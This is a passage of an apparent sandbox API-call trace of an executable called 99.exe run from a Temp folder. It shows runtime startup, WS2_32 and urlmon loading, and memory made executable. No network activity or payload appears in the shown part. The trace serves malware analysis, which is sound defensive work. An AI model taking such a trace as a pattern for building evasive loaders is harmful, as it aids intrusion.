(lpModuleName="WS2_32.dll") returned 0x75610000 [0285.875] GetModuleHandleA (lpModuleName="KERNEL32.dll") returned 0x769b0000 [0285.875] GetModuleHandleA (lpModuleName="urlmon.dll") returned 0x75a80000 [0285.876] VirtualAlloc (lpAddress=0x0, dwSize=0xaca8, flAllocationType=0x1000, flProtect=0x4) returned 0xc50000 [0286.057] GetProcAddress (hModule=0x75610000, lpProcName=0x73) returned 0x75613ab2 [0286.060] GetProcAddress (hModule=0x779e0000, lpProcName="RtlEnterCriticalSection") returned 0x77a022b0 [0286.061] GetProcAddress (hModule=0x75610000, lpProcName=0x13) returned 0x75616f01 [0286.071] GetProcAddress (hModule=0x779e0000, lpProcName="RtlLeaveCriticalSection") returned 0x77a02270 [0286.071] GetProcAddress (hModule=0x75610000, lpProcName=0x17) returned 0x75613eb8 [0286.072] GetProcAddress (hModule=0x75610000, lpProcName=0x37) returned 0x75626ef3 [0286.073] GetProcAddress (hModule=0x779e0000, lpProcName="RtlAllocateHeap") returned 0x77a0e026 [0286.073] GetProcAddress (hModule=0x75610000, lpProcName=0x38) returned 0x75626d62 [0286.074] GetProcAddress (hModule=0x75610000, lpProcName=0x34) returned 0x75627673 [0286.074] GetProcAddress (hModule=0x75610000, lpProcName=0x3) returned 0x75613918 [0286.074] GetProcAddress (hModule=0x75610000, lpProcName=0xc) returned 0x7561b131 [0286.075] GetProcAddress (hModule=0x75610000, lpProcName=0xb) returned 0x7561311b [0286.075] GetProcAddress (hModule=0x75610000, lpProcName=0xf) returned 0x75612d8b [0286.076] GetProcAddress (hModule=0x75610000, lpProcName=0x8) returned 0x75612d57 [0286.076] GetProcAddress (hModule=0x75610000, lpProcName=0x4) returned 0x75616bdd [0286.077] GetProcAddress (hModule=0x75610000, lpProcName=0x70) returned 0x756137d9 [0286.077] GetProcAddress (hModule=0x75610000, lpProcName=0x6f) returned 0x756137ad [0286.078] GetProcAddress (hModule=0x75610000, lpProcName=0x33) returned 0x75626c01 [0286.078] GetProcAddress (hModule=0x75610000, lpProcName=0x10) returned 0x75616b0e [0286.079] GetProcAddress (hModule=0x75610000, lpProcName=0x9) returned 0x75612d8b [0286.237] GetProcAddress (hModule=0x779e0000, lpProcName="RtlDeleteCriticalSection") returned 0x77a145f5 [0286.238] GetProcAddress (hModule=0x779e0000, lpProcName="RtlEncodePointer") returned 0x77a20fcb [0286.238] GetProcAddress (hModule=0x779e0000, lpProcName="RtlInitializeCriticalSection") returned 0x77a12c42 [0286.239] GetProcAddress (hModule=0x779e0000, lpProcName="RtlInitializeSListHead") returned 0x77a194a4 [0286.240] GetProcAddress (hModule=0x779e0000, lpProcName="RtlDecodePointer") returned 0x77a19d35 [0286.242] GetProcAddress (hModule=0x779e0000, lpProcName="RtlExitUserThread") returned 0x77a3d598 [0286.243] GetProcAddress (hModule=0x779e0000, lpProcName="RtlSizeHeap") returned 0x77a13002 [0286.244] GetProcAddress (hModule=0x779e0000, lpProcName="RtlReAllocateHeap") returned 0x77a21f6e [0286.246] VirtualProtect (in: lpAddress=0x454000, dwSize=0x494, flNewProtect=0x40, lpflOldProtect=0x684a28 | out: lpflOldProtect=0x684a28*=0x40) returned 1 [0286.248] VirtualProtect (in: lpAddress=0x454000, dwSize=0x49c, flNewProtect=0x40, lpflOldProtect=0x684a28 | out: lpflOldProtect=0x684a28*=0x40) returned 1 [0286.248] VirtualProtect (in: lpAddress=0x469808, dwSize=0xdc, flNewProtect=0x40, lpflOldProtect=0x684a28 | out: lpflOldProtect=0x684a28*=0x40) returned 1 [0286.253] VirtualProtect (in: lpAddress=0x400000, dwSize=0x200, flNewProtect=0x4, lpflOldProtect=0x684a28 | out: lpflOldProtect=0x684a28*=0x2) returned 1 [0286.253] VirtualProtect (in: lpAddress=0x400000, dwSize=0x200, flNewProtect=0x2, lpflOldProtect=0x684a28 | out: lpflOldProtect=0x684a28*=0x4) returned 1 [0286.255] GetProcessHeap () returned 0xc90000 [0286.255] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x10) returned 0xca4a10 [0286.255] GetProcessHeap () returned 0xc90000 [0286.255] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x10) returned 0xca4a28 [0286.257] SetCurrentDirectoryW (lpPathName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 1 [0286.258] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff24 | out: lpSystemTimeAsFileTime=0x18ff24*(dwLowDateTime=0xcfc7b100, dwHighDateTime=0x1d7fb6e)) [0286.258] GetCurrentThreadId () returned 0xb80 [0286.258] GetCurrentProcessId () returned 0xb7c [0286.258] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff1c | out: lpPerformanceCount=0x18ff1c*=3101246363039) returned 1 [0286.260] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0286.261] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x73550000 [0286.503] GetProcAddress (hModule=0x73550000, lpProcName="InitializeCriticalSectionEx") returned 0x0 [0286.503] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0286.504] GetLastError () returned 0x7e [0286.504] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x769b0000 [0286.505] GetProcAddress (hModule=0x769b0000, lpProcName="FlsAlloc") returned 0x769c4ee3 [0286.508] GetProcAddress (hModule=0x769b0000, lpProcName="FlsSetValue") returned 0x769c41c0 [0286.511] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x73550000 [0286.513] GetProcAddress (hModule=0x73550000, lpProcName="InitializeCriticalSectionEx") returned 0x0 [0286.513] GetProcessHeap () returned 0xc90000 [0286.513] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0286.513] GetLastError () returned 0x7e [0286.513] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x769b0000 [0286.514] GetProcAddress (hModule=0x769b0000, lpProcName="FlsAlloc") returned 0x769c4ee3 [0286.518] GetLastError () returned 0x7e [0286.518] GetProcAddress (hModule=0x769b0000, lpProcName="FlsGetValue") returned 0x769c1252 [0286.518] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x364) returned 0xcb6a10 [0286.519] GetProcAddress (hModule=0x769b0000, lpProcName="FlsSetValue") returned 0x769c41c0 [0286.524] SetLastError (dwErrCode=0x7e) [0286.526] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0xc00) returned 0xcb6d80 [0286.529] GetStartupInfoW (in: lpStartupInfo=0x18fe4c | out: lpStartupInfo=0x18fe4c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\99.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x432c10, hStdOutput=0xc0765263, hStdError=0xfffffffe)) [0286.529] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0286.529] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0286.529] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0286.532] GetCommandLineA () returned="\"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\99.exe\" " [0286.532] GetCommandLineW () returned="\"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\99.exe\" " [0286.532] GetLastError () returned 0x7e [0286.532] SetLastError (dwErrCode=0x7e) [0286.532] GetLastError () returned 0x7e [0286.532] SetLastError (dwErrCode=0x7e) [0286.535] GetACP () returned 0x4e4 [0286.535] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x220) returned 0xcb5370 [0286.535] IsValidCodePage (CodePage=0x4e4) returned 1 [0286.535] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe7c | out: lpCPInfo=0x18fe7c) returned 1 [0286.535] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f744 | out: lpCPInfo=0x18f744) returned 1 [0286.535] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd58, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0286.535] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd58, cbMultiByte=256, lpWideCharStr=0x18f4e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0286.535] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f758 | out: lpCharType=0x18f758) returned 1 [0286.538] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd58, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0286.538] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd58, cbMultiByte=256, lpWideCharStr=0x18f498, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0286.538] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0286.538] GetLastError () returned 0x7e [0286.539] GetProcAddress (hModule=0x769b0000, lpProcName="LCMapStringEx") returned 0x76a44d91 [0286.539] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0286.539] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f288, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0286.539] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x18fc58, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x0f:(À\x94þ\x18", lpUsedDefaultChar=0x0) returned 256 [0286.540] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd58, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0286.540] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd58, cbMultiByte=256, lpWideCharStr=0x18f4a8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0286.540] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0286.540] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f298, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0286.540] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x18fb58, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x0f:(À\x94þ\x18", lpUsedDefaultChar=0x0) returned 256 [0286.544] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x80) returned 0xc92788 [0286.547] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x46d3c8, nSize=0x104 | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\99.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\99.exe")) returned 0x2b [0286.547] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x34) returned 0xcb5598 [0286.547] RtlInitializeSListHead (in: ListHead=0x46cd18 | out: ListHead=0x46cd18) [0286.660] GetLastError () returned 0x0 [0286.664] SetLastError (dwErrCode=0x0) [0286.666] GetEnvironmentStringsW () returned 0xcb8188* [0286.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1415, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1415 [0286.669] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x587) returned 0xcb8ca0 [0286.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1415, lpMultiByteStr=0xcb8ca0, cbMultiByte=1415, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1415 [0286.672] FreeEnvironmentStringsW (penv=0xcb8188) returned 1 [0286.672] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x98) returned 0xc928b8 [0286.672] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x1f) returned 0xcb8030 [0286.674] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x2b) returned 0xcad948 [0286.674] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x37) returned 0xc92958 [0286.674] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x3c) returned 0xca1f10 [0286.674] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x31) returned 0xcb8188 [0286.674] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x18) returned 0xc92810 [0286.674] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x24) returned 0xcad2b8 [0286.674] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x14) returned 0xcb81c8 [0286.674] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0xd) returned 0xca4a40 [0286.674] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x1a) returned 0xcb8058 [0286.674] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x2e) returned 0xcad980 [0286.674] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x19) returned 0xcb8080 [0286.674] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x17) returned 0xcb81e8 [0286.674] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0xe) returned 0xca4a58 [0286.674] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x95) returned 0xcb8208 [0286.675] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x3e) returned 0xca1f58 [0286.675] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x1b) returned 0xcb80a8 [0286.675] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x1d) returned 0xcb80d0 [0286.675] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x48) returned 0xca94b8 [0286.675] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x12) returned 0xcb82a8 [0286.675] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x18) returned 0xcb82c8 [0286.675] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, 